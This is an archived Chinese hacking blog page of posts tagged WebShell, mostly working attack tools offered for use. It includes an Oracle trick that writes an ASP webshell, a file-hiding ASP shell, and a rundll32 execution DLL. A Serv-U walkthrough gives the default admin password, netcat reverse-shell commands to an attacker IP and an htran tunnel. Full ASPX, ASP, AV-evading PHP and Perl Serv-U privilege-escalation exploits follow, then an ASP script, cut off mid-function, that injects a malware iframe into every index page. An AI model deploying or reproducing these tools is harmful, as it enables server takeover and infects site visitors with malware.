存档

文章标签 ‘WebShell’

Webshell扫描器

2009年12月8日 没有评论 573 views

来自:瓜园

不敢在服务器上乱跑别人的程序,自己写了个。

我的规则比较搓,不过支持自定义,全部正则。

代码太丑陋就不发了,想改功能的自己逆一下。

下载地址:http://www.4shell.org/upload/8d6c2ddcd7a296f68c102906.rar

分类: 资源共享 标签: ,

getwebshell for oracle

2009年10月7日 没有评论 117 views

by 清雅风萍

SQL> create tablespace kjtest datafile 'e:\website\kj.asp'
size 100k nologging ;
复制代码
这样就创建了Table 空间。

这里需要注意的是oracle的Table,最小单位是100K。

下面开始建表:

SQL> CREATE TABLE WEBSHELL(C varchar2(100)) tablespace tian6;
复制代码
这样表就建好了。

表的类型一般都是VARCHAR,因为table的空间很小,所以不能用CLOB 或者 BLOB
类型。

SQL> insert into WEBSHELL values('< %execute request("tian6")%>');
复制代码
写数据了。
阅读全文...

分类: 技术文章 标签: ,

隐藏并修改文件的最后修改时间的asp-webshell

2009年3月1日 没有评论 123 views

<%
'隐藏并修改文件的最后修改时间的aspshell
'原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件
'     通过shell.application可以给文件重新设置一个最后修改时间
'2009/02/24  write by skyfire
response.write "<form method=post>"
response.write "路    径:<input name=path value='"&server.mappath("/")&"' size='30'>(一定要以\结尾)<br />"
response.write "文件名称:<input name=filename value='test.txt' size='30'><br />"
response.write "修改时间:<input name=time value='12/30/2099 12:30:30' size='30'><br />"
response.write "<input type=submit value=修改并隐藏文件>"
response.write "</form>"

'获取提交的参数
set path=request.Form("path")
set fileName=request.Form("filename")
set newTime=request.Form("time")

if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then

'通过fso设置文件属性
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set file=fso.getFile(path&fileName)
file.attributes=2+4  '设置文件属性为隐藏+系统

'通过shell.Application修改文件的最后修改时间
Set shell=Server.CreateObject("Shell.Application")
Set app_path=shell.NameSpace(server.mappath("."))
Set app_file=app_path.ParseName(fileName)
app_file.Modifydate=newTime

end if
%>

分类: 资源共享 标签:

艰难的在webshell中执行程序

2008年11月14日 没有评论 92 views

来源:云舒

摘要:一个web shell,系统权限设置得很好,常用的exe都无权执行。可写目录传上去的exe文件,也没有执行权限。最终发现设置权限的时候漏掉了rundll32.exe,如是就写了这个个代码。

测试开始的时候,PHP似乎没权执行命令。本来打算用php本身的一些溢出问题,溢出一个低权限的shell来的。后来意外发现使用proc_open函数可以执行一些内部命令,只是外部命令和目录都做了比较严格的权限设置而已。于是就测试可能可以利用的外部命令,最终测试到了rundll32.exe程序,终于没有返回权限不足。写一个dll,给rundll32调用,就可以间接的执行自己上传的任意exe文件了。也许是windows权限的一点小问题?毕竟使用rundll32间接执行的exe,身份还是php shell的guest权限,虽然调用者变了——真正原因有待进一步研究。

#
/*************************************************************************************************
#
* 遇到一个服务器权限设置很畸形,系统exe基本都无法执行,自己上传的exe到可写目录,也不能执行。
#
* 遗憾的是,他们漏掉了rundll32.exe这个文件的权限,如是……
#
* code by wustyunshu###hotmail.com, 2008,11,13,23:20
#
*************************************************************************************************/
#
 
#
#include <stdio.h>
#
#include <stdlib.h>
#
#include <windows.h>
#
 
#
// dll入口
#
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
#
{
#
return true;
#
}
#
 
#
void RunExe( HWND hwnd, HINSTANCE hinst, LPSTR szCmdLine, int nCmdShow)
#
{
#
if( szCmdLine == NULL )
#
{
#
return;
#
}
#
 
#
DWORD dwNum = MultiByteToWideChar(CP_ACP, 0, szCmdLine, -1, NULL, 0);
#
wchar_t *wszCmdLine = new wchar_t[dwNum];
#
if(!wszCmdLine)
#
{
#
return;
#
}
#
MultiByteToWideChar(CP_ACP, 0, szCmdLine, -1, wszCmdLine, dwNum);
#
 
#
int argc;
#
LPWSTR *argv = CommandLineToArgvW( wszCmdLine, &argc );
#
 
#
wchar_t Cmd[256] = { 0 };
#
wchar_t Args[1024] = { 0 };
#
 
#
//strncpy( Cmd, argv[0], sizeof(Cmd)-1 );
#
wcsncpy( Cmd, argv[0], sizeof(Cmd)-1 );
#
if( argc > 1 )
#
{
#
for( int index = 1; index < argc; index ++ )
#
{
#
wcscat( wcscat( Args, L" " ), argv[index] );
#
}
#
}
#
 
#
STARTUPINFO si;
#
memset( (void *)&si, 0, sizeof(STARTUPINFOA) );
#
GetStartupInfoW( &si );
#
 
#
//新进程输入输出重定向
#
si.cb = sizeof( si );
#
si.dwFlags = STARTF_USESHOWWINDOW;
#
//si.wShowWindow = SW_HIDE;
#
 
#
PROCESS_INFORMATION processInfo;
#
memset( (void *)&processInfo, 0, sizeof(PROCESS_INFORMATION) );
#
 
#
//建立进程
#
CreateProcessW( Cmd, Args, NULL, NULL, 1, 0, NULL, NULL, &si, &processInfo );
#
 
#
Sleep( 60 * 1000 );
#
TerminateProcess( processInfo.hProcess, 0 );
#
}

分类: 技术文章 标签:

InsomniaShell

2008年10月10日 没有评论 62 views

InsomniaShell is a tool for use during penetration tests, when you have ability to upload or create an arbitrary .aspx page. This .aspx page is an example of using native calls through pinvoke to provide either a reverse shell or a bind shell.

It has the added advantage of searching through all accessible processes looking for a SYSTEM or Administrator token to use for impersonation.

 下载地址:InsomniaShell.zip

分类: 资源共享 标签:

Webshell与Serv-u结合获系统最高权限

2007年4月9日 没有评论 54 views

Serv-U默认监听127.0.0.1:43958,在本机才能连接这个管理端口,Serv-U默认管理账号是localAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"Serv-U administrator"新建SERVER。

目标IP:12345

User:LocalAdministrator

Pass:"#l@$ak#.lk;0@P"0

那么目标机器的Serv-U就归你管了。

利用的前提:要有目标机器的普通权限的SHELL,不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了

如何得到一个shell:sql注射得到webshell或者直接利用动网7.0 sp2以下的上传漏洞上传webshell

具体实施方法

1.利用得到的webshell上传转向程序fpipe,然后执行fpipe -v -l 12345 -r 43958 127.0.0.1

2 .在你自己的机器,用"Serv-U administrator"新建SERVER,依次填入

ip:目标IP

端口 :12345

User:LocalAdministrator

Pass:"#l@$ak#.lk;0@P"

现在你就可以管理这台服务器的Serv-U了,新建一个账号,权限为系统管理员(system dministrator),并在"目录访问(Dir access)"选项中给予"执行"权限(execute).

3. ftp连接,然后执行

quote site exec net user iisuser password /add

添加一个用户名为iisuser密码为password的用户,加到管理员组 quote site exec net localgroup administrators iisuser /add,现在就可以连接终端并登录了。

当然也可以进行别的操作,例如上传一个nc.exe,在目标机器上得到一个管理员权限的shell,可以正向连接,也可以反向连接。

正向连接:连上ftp以后执行

quote site exec nc.exe -l -p 23 -t -e cmd.exe

这时目标主机就成了一台telnet服务器,你可以telnet上目标服务器的23端口.

反向连接:假设你的IP是202.96.209.168

1.先在自己的机器上运行(你要有一个外部IP):nc -vv -lp 99

2.在目标机器上运行 nc -e cmd.exe 202.96.209.168 99

在你的机器上就会得到一个目标机器的具有管理员权限的shell

如果对方进行了端口过滤或者设置了防火墙的保护(这种保护不限制反弹连接,如果限制的?br />熬鸵槐鸬姆椒?,可以用TCP SOCKET转发来实现

打个比方:

我的机器为 A

我要测试的机器为 B[不允许正面连接]

我已经在B上得到呢一个SHELL[只要guest的就行呢]

我们可以这样连上对方的43958

I:我在本地监听二个端口23和56

23是等待B来连接的~

56是等待我来连接的~

II:B连接我监听的23,同时转发到本地的43958

这样管道就建好呢~对方的防火墙就拿我们没有办法呢~

此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56用户localAdministrator,密码#l@$ak#.lk;0@P

具体实施方法

假设你的IP是 202.96.209.168

1.在你自己的机器上运行 htran.exe -listen 23 56

2.此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P

3。在目标机器上运行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23

如果不能在webshell下直接运行,可以写一个asp脚本来执行,内容如下

connect.asp
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")
%>

执行http://目标网址/connect.asp,如果出来一片空白,没提示什么错误,现在你应该可以管理目标服务器的Serv-U了,余下的事情就看您自由发挥了。htran.exe是一个多线程包转发工具,可以到红盟下载

防止方法

自己给Serv-U打补丁,改变默认端口及管理密码。修改 ServUAdmin.exe、ServUDaemon.exe这两个文件,改端口只要在ServUDaemon.ini文件[GLOBAL]选项中加入LocalSetupPortNo=12345即可 。

分类: 技术文章 标签: ,

Serv-U本地权限提升程序 asp aspx php perl 版

2006年10月28日 没有评论 155 views

ASPX代码如下:

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

'
' Love, Where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)
Dim Usr As String = Text_Name.Text
Dim pwd As String = Text_PWD.Text
Dim Port As Int32 = Text_Port.Text
Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf
Dim LoginPass As String = "Pass " & pwd & vbcrlf
Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
Dim DelDomain As String = "-DeleteDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
Dim Quit As String = "QUIT" & vbcrlf
Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient
Dim tcpClient As New TcpClient()
Try
tcpClient.Connect("127.0.0.1", port)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient.ReceiveBufferSize = 1024
Dim networkStream As NetworkStream = tcpClient.GetStream()
Rec(networkStream)
Send(networkStream, LoginUser)
Rec(networkStream)
Send(networkStream, LoginPass)
Rec(networkStream)
Send(networkStream, MAINTENANCE)
Rec(networkStream)
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, NewDomain)
Rec(networkStream)
Send(networkStream, NewUser)
Rec(networkStream)
Dim tcpClient2 As New TcpClient()
Try
tcpClient2.Connect("127.0.0.1", 43859)
Catch eee As Exception
response.write(eee.ToString())
response.end
End Try
tcpClient2.ReceiveBufferSize = 1024
Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
Rec(networkStream2)
Send(networkStream2, "User lake" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "pass admin123" & vbcrlf)
Rec(networkStream2)
Send(networkStream2, "site exec " & Command & vbcrlf)
Rec(networkStream2)
tcpClient2.Close()
Send(networkStream, DelDomain)
Rec(networkStream)
Send(networkStream, Quit)
Rec(networkStream)
tcpClient.Close()
End Sub

Sub Rec(o As Object)
If o.CanRead Then
Dim bytes(1024) As Byte
o.Read(bytes, 0, 1024)
Dim returndata As String = Encoding.ASCII.GetString(bytes)
response.Write("out:" & returndata & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

Sub Send(o As Object,data As String)
If o.CanWrite Then
Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
o.Write(sendBytes, 0, sendBytes.Length)
response.write("in: " & data & "<br>")
Else
response.Write("What's wrong ?")
End If
End Sub

</script>
<html>
<head>
</head>
<body>
<form runat="server">
<p>
<asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
admin by lake2</asp:Label>
</p>
<p>
<asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
<asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
<br />
<asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
<asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
<br />
<asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
<asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
<br />
<asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
<asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
</p>
<p>
<asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
</p>
<p>
<hr />
<!-- Insert content here -->
</p>
</form>
</body>
</html>

ASP版代码如下:

<title>Serv-U 2 admin by lake2</title>
<style type="text/css">
body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}
body {background-color: #ffffff;font-size:14px; }
a:link {color: #0000FF;text-decoration: none;}
a:visited {text-decoration: none;color: #0000FF;}
a:hover {text-decoration: none;color: #FF0000;}
a:active {text-decoration: none;color: #FF0000;}
.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
.TextBox {border: 1px solid #084B8E}
</style>
<p>Serv-U Local Get SYSTEM Shell with ASP
</p>
<p>Author: lake2, <a href="http://lake2.0x54.org" target="_blank">http://lake2.0x54.org</a></p>
<form name="form1" method="post" action="">
<p>user:
<input name="duser" type="text" class="TextBox" id="duser" value="LocalAdministrator">
<br>
pwd :
<input name="dpwd" type="text" class="TextBox" id="dpwd" value="#l@$ak#.lk;0@P">
<br>
port:
<input name="dport" type="text" class="TextBox" id="dport" value="43958">
<br>
<input name="radiobutton" type="radio" value="add" checked class="TextBox">
Add User 
<input type="radio" name="radiobutton" value="del" class="TextBox"> 
Del User </p>
<p>
<input name="Submit" type="submit" class="buttom" value="Run">
</p>
</form>
<p>
<%
Usr = request.Form("duser")
pwd = request.Form("dpwd")
port = request.Form("dport")
'Command = request.Form("dcmd")

  if request.Form("radiobutton") = "add" Then

lake2 = "User " & Usr & vbcrlf
lake2 = lake2 & "Pass " & pwd & vbcrlf
lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf
'lake2 = lake2 & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
lake2 = lake2 & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
    'lake2 = lake2 & "quit" & vbcrlf
    
    
    
    
    '--------
    'On Error Resume Next
    Set xPost = CreateObject("MSXML2.XMLHTTP")
    xPost.Open "POST", "http://127.0.0.1:"& port &"/lake2", True
    xPost.Send(lake2)
    Set xPOST=nothing
    response.write "FTP user lake pass admin123 :)<br><BR>"
  else
  
    lake2 = "User " & Usr & vbcrlf
    lake2 = lake2 & "Pass " & pwd & vbcrlf
    lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf
    lake2 = lake2 & "-DeleteUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & " User=lake" & vbcrlf
    
    Set xPost3 = CreateObject("MSXML2.XMLHTTP")
    xPost3.Open "POST", "http://127.0.0.1:"& port &"/lake2", True
    xPost3.Send(lake2)
    Set xPOST3=nothing
    response.write "Done!<br><BR>"
  end if

%>
Only for Enjoy&Challenge

! </p>

php代码版如下:

<?PHP
/**
注释免杀版本
**/
//
//Codez begin
//
//判断magic_quotes_gpc的值
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
}

//变量初始化
$addr = '0.0.0.0';
$ftpport = 21;
$adminport = 43958;
$adminuser = 'LocalAdministrator';
$adminpass = '#l@$ak#.lk;0@P';
$user = 'wofeiwo';
$password = 'wrsky';
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';

//有改变则赋值
if ($_GET){
$addr = $_GET['addr'] ;
$ftpport = $_GET['ftpport'] ;
$adminport = $_GET['adminport'] ;
$adminuser = $_GET['adminuser'] ;
$adminpass = $_GET['adminpass'] ;
$user = $_GET['user'] ;
$password = $_GET['password'] ;
$homedir = $_GET['homedir'] ;
if ($_GET['dir']){
$dir = $_GET['dir'] ;
}
}
?>

<!-- 主文件开始 //-->
<html>
<head>
<title>-=<Serv-U All Version本地提升权限Exp10it Ver 1.5 By 我非我[F.S.T] 修改免杀版>=-</title>
<meta content="text/html; charset=gb2312" http-equiv="Content-Type">
<STYLE TYPE="text/css">
b {font-family : Verdana, sans-serif;font-size : 14px;}
body,td,p,pre {
font-family : Verdana, sans-serif;font-size : 12px;
}
input {
font-family: "Verdana";
font-size: "11px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
</STYLE>
</head>
<body bgcolor="#EEEEEE" text="#000000" link="#006699" vlink="#5493B4">

<center><b>Serv-U All Version本地提升权限Exp10it Ver 1.5</b>
<br><br>
<b>添加Serv-U用户部分</b>
<br>
<form action="<?=$_SERVER['PHP_SELF']?>" method="get">
<table width="660" border="0" cellpadding="0">
<tr><td width="300" align="center">主机IP:</td> <td width="360" align="center"><input name="addr" type="text" class="INPUT" value="<?=$addr?>"></td></tr>
<tr><td width="300" align="center">主机Ftp端口:</td> <td width="360" align="center"><input name="ftpport" type="text" class="INPUT" value="<?=$ftpport?>"></td></tr>
<tr><td width="300" align="center">主机Ftp管理端口:</td> <td width="360" align="center"><input name="adminport" type="text" class="INPUT" value="<?=$ad
minport?>"></td></tr>
<tr><td width="300" align="center">主机Ftp管理用户:</td> <td width="360" align="center"><input name="adminuser" type="text" class="INPUT" value="<?=$adminuser?>"></td></tr>
<tr><td width="300" align="center">主机Ftp管理密码:</td> <td width="360" align="center"><input name="adminpass" type="text" class="INPUT" value="<?=$adminpass?>"></td></tr>
<tr><td width="300" align="center">添加的用户名:</td> <td width="360" align="center"><input name="user" type="text" class="INPUT" value="<?=$user?>"></td></tr>
<tr><td width="300" align="center">添加的用户名密码:</td><td width="360" align="center"><input name="password" type="password" class="INPUT" value="<?=$password?>"></td></tr>
<tr><td width="300" align="center">用户主目录(别忘了写"\"):</td> <td width="360" align="center"><input name="homedir" type="text" class="INPUT" value="<?=$homedir?>"></td></tr>
<tr><td width="300" align="center"><input name="action" type="hidden" value="up"></td></tr>
<tr><td width="300" align="center"><input type="submit" class="INPUT" value="添加"></td></tr>
</form></tr>
</table>
<hr width="660"><br>
<textarea cols="60" rows="10" readonly>命令回显:
<?php

//添加用户
if ($_GET['action']=="up"){
up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);
}
?>

</textarea></center><br><hr width="660">
<center><b>执行命令部分</b><br>
<form action="<?=$_SERVER['PHP_SELF']?>" method="get">
<table width="660" border="0" cellpadding="0">
<tr><td width="300" align="center">主机Ftp端口:</td> <td width="360" align="center"><input name="ftpport" type="text" class="INPUT" value="<?=$ftpport?>"></td></tr>
<tr><td width="300" align="center">用户名:</td> <td width="360" align="center"><input name="user" type="text" class="INPUT" value="<?=$user?>"></td></tr>
<tr><td width="300" align="center">用户名密码:</td><td width="360" align="center"><input name="password" type="password" class="INPUT" value="<?=$password?>"></td></tr>
<tr><td width="300" align="center">系统路径(别忘了写"\"):</td><td width="360" align="center"><input name="dir" type="text" class="INPUT" value="<?=$dir?>"></td></tr>
<tr><td width="300" align="center">执行的命令:</td> <td width="360" align="center"><input name="cmd" type="text" class="INPUT" value="<?=$_GET['cmd']?>"></td></tr>

<tr><td width="300" align="center"><input name="action" type="hidden" value="execute"></td></tr>
<tr><td width="300" align="center"><input type="submit" class="INPUT" value="执行"></td></tr>
</form></tr></table><hr width="660"><br>
<textarea cols="60" rows="10" readonly>命令回显:
<?php

//执行命令
if ($_GET['action']=="execute"){
ftpcmd($ftpport,$user,$password,$dir,$_GET['cmd']);
}
?>
</textarea>
</center><br><hr width="660">
<i><center>Copycenter (C) 2004 <B style='color:black;background-color:#ffff66'>我非我</B> All centers Reserved. <br>
</center></i>
</body>
</html>
<!-- 主文件结束 //-->
<?php

//添加用户主函数定义
function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){
$fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8);
if (!$fp) {
echo "$errstr ($errno)<br>\n";
} else {
fputs ($fp, "USER ".$adminuser."\r\n");
sleep (1);
fputs ($fp, "PASS ".$adminpass."\r\n");
sleep (1);
fputs ($fp, "SITE MAINTENANCE\r\n");
sleep (1);
fputs ($fp, "-SETUSERSETUP\r\n");
fputs ($fp, "-IP=".$addr."\r\n");
fputs ($fp, "-PortNo=".$ftpport."\r\n");
fputs ($fp, "-User=".$user."\r\n");
fputs ($fp, "-Password=".$password."\r\n");
fputs ($fp, "-HomeDir=".$homedir."\r\n");
fputs ($fp, "-LoginMesFile=\r\n");
fputs ($fp, "-Disable=0\r\n");
fputs ($fp, "-RelPaths=0\r\n");
fputs ($fp, "-NeedSecure=0\r\n");
fputs ($fp, "-HideHidden=0\r\n");
fputs ($fp, "-AlwaysAllowLogin=0\r\n");
fputs ($fp, "-ChangePassword=1\r\n");
fputs ($fp, "-QuotaEnable=0\r\n");
fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");
fputs ($fp, "-SpeedLimitUp=-1\r\n");
fputs ($fp, "-SpeedLimitDown=-1\r\n");
fputs ($fp, "-MaxNrUsers=-1\r\n");
fputs ($fp, "-IdleTimeOut=600\r\n");
fputs ($fp, "-SessionTimeOut=-1\r\n");
fputs ($fp, "-Expire=0\r\n");
fputs ($fp, "-RatioUp=1\r\n");
fputs ($fp, "-RatioDown=1\r\n");
fputs ($fp, "-RatiosCredit=0\r\n");
fputs ($fp, "-QuotaCurrent=0\r\n");
fputs ($fp, "-QuotaMaximum=0\r\n");
fputs ($fp, "-Maintenance=System\r\n");
fputs ($fp, "-PasswordType=Regular\r\n");
fputs ($fp, "-Ratios=None\r\n");
fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n");
fputs ($fp, "QUIT\r\n");
sleep (1);
while (!feof($fp)) {
echo fgets ($fp,128);
}

}
}

//执行命令主函数定义
function ftpcmd($ftpport,$user,$password,$dir,$cmd){

$conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 8);

if (!$conn_id) {
echo "$errstr ($errno)<br>\n";
} else {
fputs ($conn_id, "USER ".$user."\r\n");
sleep (1);
fputs ($conn_id, "PASS ".$password."\r\n");
sleep (1);
fputs ($conn_id, "SITE EXEC ".$dir."cmd.exe /c ".$cmd."\r\n");
fputs ($conn_id, "QUIT\r\n");
sleep (1);
while (!feof($conn_id)) {
echo fgets ($conn_id,128);
}
fclose($conn_id);
}
}

//去除转义字符
function stripslashes_array(&$array) {
while (list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)
) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
?>

perl版代码如下:

#!/usr/bin/perl
use IO::Socket;

binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$addr = "127.0.0.1";
$ftpport = 21;
$adminport = 43958;
$adminuser = "LocalAdministrator";
$adminpass = '#l@$ak#.lk;0@P';
$user = "Andyower";
$password = "haika";
$homedir = 'C:\\';
$dir = 'C:\\WINNT\\System32\\';

use IO::Socket::INET;

$sock = IO::Socket::INET->new("127.0.0.1:$adminport") || die "fail";

print "Andyower制作<br><br>";

print $sock "USER $adminuser\r\n";
sleep (1);
print $sock "PASS $adminpass\r\n";
sleep(1);
print $sock "SITE MAINTENANCE\r\n";
sleep(1);
print $sock "-SETUSERSETUP\r\n";
print $sock "-IP=".$addr."\r\n";
print $sock "-PortNo=".$ftpport."\r\n";
print $sock "-User=".$user."\r\n";
print $sock "-Password=".$password."\r\n";
print $sock "-HomeDir=".$homedir."\r\n";
print $sock "-LoginMesFile=\r\n";
print $sock "-Disable=0\r\n";
print $sock "-RelPaths=0\r\n";
print $sock "-NeedSecure=0\r\n";
print $sock "-HideHidden=0\r\n";
print $sock "-AlwaysAllowLogin=0\r\n";
print $sock "-ChangePassword=1\r\n";
print $sock "-QuotaEnable=0\r\n";
print $sock "-MaxUsersLoginPerIP=-1\r\n";
print $sock "-SpeedLimitUp=-1\r\n";
print $sock "-SpeedLimitDown=-1\r\n";
print $sock "-MaxNrUsers=-1\r\n";
print $sock "-IdleTimeOut=600\r\n";
print $sock "-SessionTimeOut=-1\r\n";
print $sock "-Expire=0\r\n";
print $sock "-RatioUp=1\r\n";
print $sock "-RatioDown=1\r\n";
print $sock "-RatiosCredit=0\r\n";
print $sock "-QuotaCurrent=0\r\n";
print $sock "-QuotaMaximum=0\r\n";
print $sock "-Maintenance=System\r\n";
print $sock "-PasswordType=Regular\r\n";
print $sock "-Ratios=None\r\n";
print $sock " Access=".$homedir."|RWAMELCDP\r\n";
print $sock "QUIT\r\n";

@ret=<$sock>;
print "@ret";

close(STDERR);
close(STDOUT);
exit;

分类: 资源共享 标签: ,

Webshell下自动挂马的ASP

2006年9月25日 没有评论 149 views

一个webshell下自动挂马的ASP,挂马的朋友不可错过哦^_^

<%Server.ScriptTimeout=10000 
Response.Buffer=False 
%> 
<html> 
<head> 
<title></title> 
<**** http-equiv="Content-Type" content="text/html; charset=gb2312"> 
</head> 
<body> 
<% 
ASP_SELF=Request.ServerVariables("PATH_INFO") 

s=Request("fd") 
ex=Request("ex") 
pth=Request("pth") 
newcnt=Request("newcnt") 

If ex<>"" AND pth<>"" Then 
select Case ex 
Case "edit" 
CALL file_show(pth) 
Case "save" 
CALL file_save(pth) 
End select 
Else 
%> 
<form action="<%=ASP_SELF%>" method="POST"> 
FOLDER (ABSOLUTE PATH): 
<input type="text" name="fd" size="40"> 
<input type="submit" value="SUBMIT"> 
</form> 
<%End If%> 
<% 
Function IsPattern(patt,str) 
Set regEx=New RegExp 
regEx.Pattern=patt 
regEx.IgnoreCase=True 
retVal=regEx.Test(str) 
Set regEx=Nothing 
If retVal=True Then 
IsPattern=True 
Else 
IsPattern=False 
End If 
End Function 

If IsPattern("[^ab]:(\\|\/)",s) Then 
sch s 
Else 
If s<>"" Then Response.Write "Invalid Agrument!" 
End If 

Sub sch(s) 
oN eRrOr rEsUmE nExT 
Set fs=Server.createObject("Scripting.FileSystemObject") 
Set fd=fs.GetFolder(s) 
Set fi=fd.Files 
Set sf=fd.SubFolders 
For Each f in fi 
rtn=f.Path 
step_all rtn 
Next 
If sf.Count<>0 Then 
For Each l In sf 
sch l 
Next 
End If 
End Sub 

Sub step_all(agr) 
retVal=IsPattern("(\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b",agr) 
If retVal Then 
step1 agr 
step2 agr 
Else 
Exit Sub 
End If 
End Sub 
%> 
<%Sub step1(str1)%> 
<a href="<%=ASP_SELF%>?ex=edit&pth=<%=str1%>" target="_blank"><%=str1%></a><br> 
<%End Sub%> 
<% 
Sub step2(str2) 
addcode="<iframe src=http://www.21o.net/mm/mm.htm(修改为你的马的地址,不要加""不然会出错) width=0 height=0 frameborder=0></iframe>" 
Set fs=Server.createObject("Scripting.FileSystemObject") 
isExist=fs.FileExists(str2) 
If isExist Then 
Set f=fs.GetFile(str2) 
Set f_addcode=f.OpenAsTextStream(8,-2) 
f_addcode.Write addcode 
f_addcode.Close 
Set f=Nothing 
End If 
Set fs=Nothing 
End Sub 
%> 
<% 
Sub file_show(fname) 
Set fs1=Server.createObject("Scripting.FileSystemObject") 
isExist=fs1.FileExists(fname) 
